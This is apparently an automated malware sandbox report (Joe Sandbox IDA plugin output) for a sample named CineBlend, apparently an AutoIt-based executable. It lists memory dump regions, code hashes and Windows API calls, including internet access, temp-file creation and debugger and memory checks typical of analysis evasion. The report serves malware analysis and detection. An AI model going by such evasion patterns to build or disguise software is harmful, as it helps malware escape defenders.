                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: #
                                          • API String ID: 0-1885708031
                                          • Opcode ID: 4bedafbfd537358252a37a7af427e77c6da644d1f843018b88c504a565adc5bd
                                          • Instruction ID: 80ed5e2a0353e0031f91690854ac7b338aefb063490ff631e3762897565e63d2
                                          • Opcode Fuzzy Hash: 4bedafbfd537358252a37a7af427e77c6da644d1f843018b88c504a565adc5bd
                                          • Instruction Fuzzy Hash: 605120315042469FCF26DF28C481ABA7BE4EF16310F6541E9EC91AB3D1DB349D86CBA1
                                          APIs
                                          • Sleep.KERNEL32(00000000), ref: 00B5F6DB
                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 00B5F6F4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: GlobalMemorySleepStatus
                                          • String ID: @
                                          • API String ID: 2783356886-2766056989
                                          • Opcode ID: 2327e718b6e0c153a98253ea6eb69a0c5445c8e6f30f87990ac4fdc3906503f1
                                          • Instruction ID: 6b98da3cd24c68363b5771a4ae5fe7e49f2471d3b0c0fc6967f630242a0df9d6
                                          • Opcode Fuzzy Hash: 2327e718b6e0c153a98253ea6eb69a0c5445c8e6f30f87990ac4fdc3906503f1
                                          • Instruction Fuzzy Hash: 48514C724087489BD320AF14DC86BAFB7E8FF95304F81489DF1D952191DF708629CB66
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper_wcslen
                                          • String ID: CALLARGARRAY
                                          • API String ID: 157775604-1150593374
                                          • Opcode ID: 827f8a6e42d1d7c4c2d6925ab6bba903d2b7c2750059279e9b8f8d2c56702d62
                                          • Instruction ID: 4544698d3937769bbb854184071cb115a9ada0e2e39bd8fdf9c57bcbd99bc5b8
                                          • Opcode Fuzzy Hash: 827f8a6e42d1d7c4c2d6925ab6bba903d2b7c2750059279e9b8f8d2c56702d62
                                          • Instruction Fuzzy Hash: 6C419F71E002199FCB04DFA8C885EAEBBF5FF59364F1440ADE506AB251EB719D81CB90
                                          APIs
                                          • _wcslen.LIBCMT ref: 00BBDB75
                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00BBDB7F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: CrackInternet_wcslen
                                          • String ID: |
                                          • API String ID: 596671847-2343686810
                                          • Opcode ID: 1e771bdcc11bd3ad0674e855d085b9a3629d0a7db6c43abfab1dbf9d80bd5323
                                          • Instruction ID: f2c7d0b5127393c74d21ffbedede3f9c6fd71578bf29410d5fc55e4e30be9504
                                          • Opcode Fuzzy Hash: 1e771bdcc11bd3ad0674e855d085b9a3629d0a7db6c43abfab1dbf9d80bd5323
                                          • Instruction Fuzzy Hash: 79315C71801119ABCF15DFA4CC85EEEBFF9FF04304F1000A9F919A6262EB759A16DB50
                                          APIs
                                          • DestroyWindow.USER32(?,?,?,?), ref: 00BD40BD
                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00BD40F8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Window$DestroyMove
                                          • String ID: static
                                          • API String ID: 2139405536-2160076837
                                          • Opcode ID: e518e16636533fde6a5cb04421d2a91978a3e185b58684901bfe33af4781be07
                                          • Instruction ID: 324adc9e9f1f45db5399b14c541fbac7c25efb93730d4242dcc732be3cabbabe
                                          • Opcode Fuzzy Hash: e518e16636533fde6a5cb04421d2a91978a3e185b58684901bfe33af4781be07
                                          • Instruction Fuzzy Hash: 96316171110604ABDB149F68CC80BFBB7E9FF48714F00865AF99587290EB71AC41DB60
                                          APIs
                                          • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00BD50BD
                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BD50D2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: '
                                          • API String ID: 3850602802-1997036262
                                          • Opcode ID: f2e57f97c6ed13bb6982206e06ce6dd36f4bef5eff2347bba65cd4f679e1e0af
                                          • Instruction ID: 753f5e7aa7801927c82904dd015768788a114502f8cf54d79f015bc431dbc45b
                                          • Opcode Fuzzy Hash: f2e57f97c6ed13bb6982206e06ce6dd36f4bef5eff2347bba65cd4f679e1e0af
                                          • Instruction Fuzzy Hash: 0431F874A0160A9FDB24CF69C990BDEBBF5FF49300F1040AAE904AB351E771A945CF90
                                          APIs
                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00BD3D18
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BD3D23
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: Combobox
                                          • API String ID: 3850602802-2096851135
                                          • Opcode ID: 1b69f39fce17009a14d1dbf4869193589d15a4235e1f7fb8dd3a23cc10790773
                                          • Instruction ID: bdaf27db52c5b923f6dacdd1ea975d4448cc923a9567c12b232935d73924b04f
                                          • Opcode Fuzzy Hash: 1b69f39fce17009a14d1dbf4869193589d15a4235e1f7fb8dd3a23cc10790773
                                          • Instruction Fuzzy Hash: B211E2717102086FEF118F14DC80FEBBBEBEB887A4F144166F918A7391E6719D518BA1
                                          APIs
                                            • Part of subcall function 00B47873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00B478B1
                                            • Part of subcall function 00B47873: GetStockObject.GDI32(00000011), ref: 00B478C5
                                            • Part of subcall function 00B47873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B478CF
                                          • GetWindowRect.USER32(00000000,?), ref: 00BD4216
                                          • GetSysColor.USER32(00000012), ref: 00BD4230
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                          • String ID: static
                                          • API String ID: 1983116058-2160076837
                                          • Opcode ID: 12bde0b4ff391af42bd1ca2a3132e4c4c0ba7629d24e32e097eab7b302280f9d
                                          • Instruction ID: 6da9c139bec657dd927eb9c3d21cf432fc688d035b4010eb4bf4015ec0638a13
                                          • Opcode Fuzzy Hash: 12bde0b4ff391af42bd1ca2a3132e4c4c0ba7629d24e32e097eab7b302280f9d
                                          • Instruction Fuzzy Hash: D711F972620209AFDB01DFA8DC45AEABBF8EB08314F014965F995D3250E775E851DB60
                                          APIs
                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00BBD7C2
                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00BBD7EB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Internet$OpenOption
                                          • String ID: <local>
                                          • API String ID: 942729171-4266983199
                                          • Opcode ID: 5b752216f820c2afd0b5159532c05d42363c769a9e1cd78c9e33f77dc8adefa8
                                          • Instruction ID: 08bc53e41e2b89c887a39b2de199516aa3fce39db10b27d71218dfe245935279
                                          • Opcode Fuzzy Hash: 5b752216f820c2afd0b5159532c05d42363c769a9e1cd78c9e33f77dc8adefa8
                                          • Instruction Fuzzy Hash: EB1106712126327BD7344B638C85FF7BFDCEB127A4F104266B50983080EAA89C40C6F0
                                          APIs
                                            • Part of subcall function 00B4B329: _wcslen.LIBCMT ref: 00B4B333
                                          • CharUpperBuffW.USER32(?,?,?), ref: 00BA761D
                                          • _wcslen.LIBCMT ref: 00BA7629
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: _wcslen$BuffCharUpper
                                          • String ID: STOP
                                          • API String ID: 1256254125-2411985666
                                          • Opcode ID: 5da89b5eeb71496248562a512d026aaeedf53a6e22fb6bcf66c487ab987a3682
                                          • Instruction ID: beed69cda1fa9b3b39d60c959584eaf17a371f8795a191d9e8f8feb5a6bc120a
                                          • Opcode Fuzzy Hash: 5da89b5eeb71496248562a512d026aaeedf53a6e22fb6bcf66c487ab987a3682
                                          • Instruction Fuzzy Hash: B601C032A4C9278BCB20AEBDDC90ABF77F5EF62750B4005A4E42193295EF31D900D690
                                          APIs
                                            • Part of subcall function 00B4B329: _wcslen.LIBCMT ref: 00B4B333
                                            • Part of subcall function 00BA45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00BA4620
                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00BA2699
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameSend_wcslen
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 624084870-1403004172
                                          • Opcode ID: d31de549385634c3348084c6a0e524c695d502b9e685b9793383760d90345e7c
                                          • Instruction ID: 6295f11ee5d4041b7ba83b6126a8adbe7becca1895e798f5c4ab4e20242bc7a4
                                          • Opcode Fuzzy Hash: d31de549385634c3348084c6a0e524c695d502b9e685b9793383760d90345e7c
                                          • Instruction Fuzzy Hash: BB01F575A06114ABCB08AB68CC51CFE73F4EF97310B0006A9A872972C1DB31990CDA50
                                          APIs
                                            • Part of subcall function 00B4B329: _wcslen.LIBCMT ref: 00B4B333
                                            • Part of subcall function 00BA45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00BA4620
                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00BA2593
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameSend_wcslen
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 624084870-1403004172
                                          • Opcode ID: ec9451ac158ced871a1b6a83a4f9942b719e799c207e87d1f1897ea528e8593e
                                          • Instruction ID: be4b142c9b6b7e15c46d63b739c38e634093cfd8ab4930bb12d9acaa3bd10d42
                                          • Opcode Fuzzy Hash: ec9451ac158ced871a1b6a83a4f9942b719e799c207e87d1f1897ea528e8593e
                                          • Instruction Fuzzy Hash: BA01F775E441046BDB04EB94C966DFE73E8EF66340F5000AAB902A32C1DB50DF0CEAB1
                                          APIs
                                            • Part of subcall function 00B4B329: _wcslen.LIBCMT ref: 00B4B333
                                            • Part of subcall function 00BA45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00BA4620
                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00BA2615
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameSend_wcslen
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 624084870-1403004172
                                          • Opcode ID: 0dc7a034083cec35dbdcd4b5f22a8488853187324f72a89530da299013c95683
                                          • Instruction ID: bd0ff95c436f4e6b6e8024e2d1b8304545a3b9e769b6e0faf016b3c80da7f0a8
                                          • Opcode Fuzzy Hash: 0dc7a034083cec35dbdcd4b5f22a8488853187324f72a89530da299013c95683
                                          • Instruction Fuzzy Hash: 9201A275E4910467CB05EBA8D951EFE77E8DB16740F5000A6B902A3281DB61CE08E6B2
                                          APIs
                                            • Part of subcall function 00B4B329: _wcslen.LIBCMT ref: 00B4B333
                                            • Part of subcall function 00BA45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00BA4620
                                          • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00BA2720
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameSend_wcslen
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 624084870-1403004172
                                          • Opcode ID: 4c7fcf38cc85dddd3d0cc75c808a5da588cd64582846da01841332442176d0c2
                                          • Instruction ID: 81e2807e6628a96a8810292a59480668e7588780dc4e5146ccf4f14c8794141a
                                          • Opcode Fuzzy Hash: 4c7fcf38cc85dddd3d0cc75c808a5da588cd64582846da01841332442176d0c2
                                          • Instruction Fuzzy Hash: 09F0F475E4421467CB04ABA88C51FFE73F8EF12740F4009A6B962A32C1DB609E0CD660
                                          APIs
                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00BA146F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Message
                                          • String ID: AutoIt$Error allocating memory.
                                          • API String ID: 2030045667-4017498283
                                          • Opcode ID: 8c65b4f0f4b9a725bb7bbd1338f602cf4b2cd24170d2ab3c542e54d38eaa948a
                                          • Instruction ID: cc5c2a4849a59131bc796e9eca98f3bbb6d99c5895bef376633cff5a48e94d59
                                          • Opcode Fuzzy Hash: 8c65b4f0f4b9a725bb7bbd1338f602cf4b2cd24170d2ab3c542e54d38eaa948a
                                          • Instruction Fuzzy Hash: F6E0D83228931436D2243799AC03F89B6C88F06B51F1148ABF7C8655C29EF7245042D9
                                          APIs
                                          • GetProcAddress.KERNEL32(5600C086,?), ref: 00B9E797
                                          • FreeLibrary.KERNEL32 ref: 00B9E7BD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: AddressFreeLibraryProc
                                          • String ID: X64
                                          • API String ID: 3013587201-893830106
                                          • Opcode ID: cdfce18bb0ca662813cb7c5b5b83418760de59307d3666818e3cf16a92877a22
                                          • Instruction ID: a8f9a9d5303c2d335222f17d80bc70c16a160d42ee5fd856a47f0aa7ca9e9be5
                                          • Opcode Fuzzy Hash: cdfce18bb0ca662813cb7c5b5b83418760de59307d3666818e3cf16a92877a22
                                          • Instruction Fuzzy Hash: 80E02BB1805505CBEB3597604C88FA877A8AF21701F5205F9F962F3021EF31C888CB44
                                          APIs
                                            • Part of subcall function 00B5FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00B610E2,?,?,?,00B4100A), ref: 00B5FAD9
                                          • IsDebuggerPresent.KERNEL32(?,?,?,00B4100A), ref: 00B610E6
                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00B4100A), ref: 00B610F5
                                          Strings
                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00B610F0
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                          • API String ID: 55579361-631824599
                                          • Opcode ID: b4b55c4113ba20bcf55b725c9ed04ed5bc4fbf2b32573ddf42e1907d81dd538f
                                          • Instruction ID: d1730f24fdb9aeae6eaefdabd4054803943caeaf4729ca2fdb31b762e67b6c85
                                          • Opcode Fuzzy Hash: b4b55c4113ba20bcf55b725c9ed04ed5bc4fbf2b32573ddf42e1907d81dd538f
                                          • Instruction Fuzzy Hash: CBE06D706003918BD320AF39E815742BBE8EB04305F048DADE886C3251EFB8D484CB91
                                          APIs
                                          • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00BB39F0
                                          • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00BB3A05
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Temp$FileNamePath
                                          • String ID: aut
                                          • API String ID: 3285503233-3010740371
                                          • Opcode ID: 28d242725f13ae7277736db472c99387ce1f5911a94caf8dbeca25411ae24d2c
                                          • Instruction ID: f7e608094e10511021c5577311c44fdcce5473ccec907ac3105ac20675104ef0
                                          • Opcode Fuzzy Hash: 28d242725f13ae7277736db472c99387ce1f5911a94caf8dbeca25411ae24d2c
                                          • Instruction Fuzzy Hash: D3D05B7150131477DA209754DC0DFCB7B6CDB44710F0002A1BA95920D1EEF0D545C790
                                          APIs
                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BD2DC8
                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00BD2DDB
                                            • Part of subcall function 00BAF292: Sleep.KERNEL32 ref: 00BAF30A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
